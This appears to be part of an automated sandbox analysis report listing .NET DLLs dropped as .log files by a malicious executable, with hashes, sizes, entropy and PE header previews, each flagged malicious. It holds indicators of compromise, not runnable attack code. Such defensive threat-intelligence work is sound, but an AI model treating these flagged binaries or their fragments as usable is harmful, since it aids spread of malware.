SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oDsvbdmi.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oGldkuRF.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oMWtDbZy.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oOhryAfv.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\oUFLhKAD.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ohaCMYDg.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\orpJRxcA.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pQzkpSqZ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pUZBMbtU.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pVxSCwGb.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pdJUqKUa.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pkzkNEOy.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ppoidSFB.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qJBbnKCZ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qQNccXPY.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\qjNliHHb.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qrwDMrig.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\quplWHMD.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rOokxXeT.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rkEsDtOz.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sWxBtiEz.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\saTzkgPu.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sbpbUBOr.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
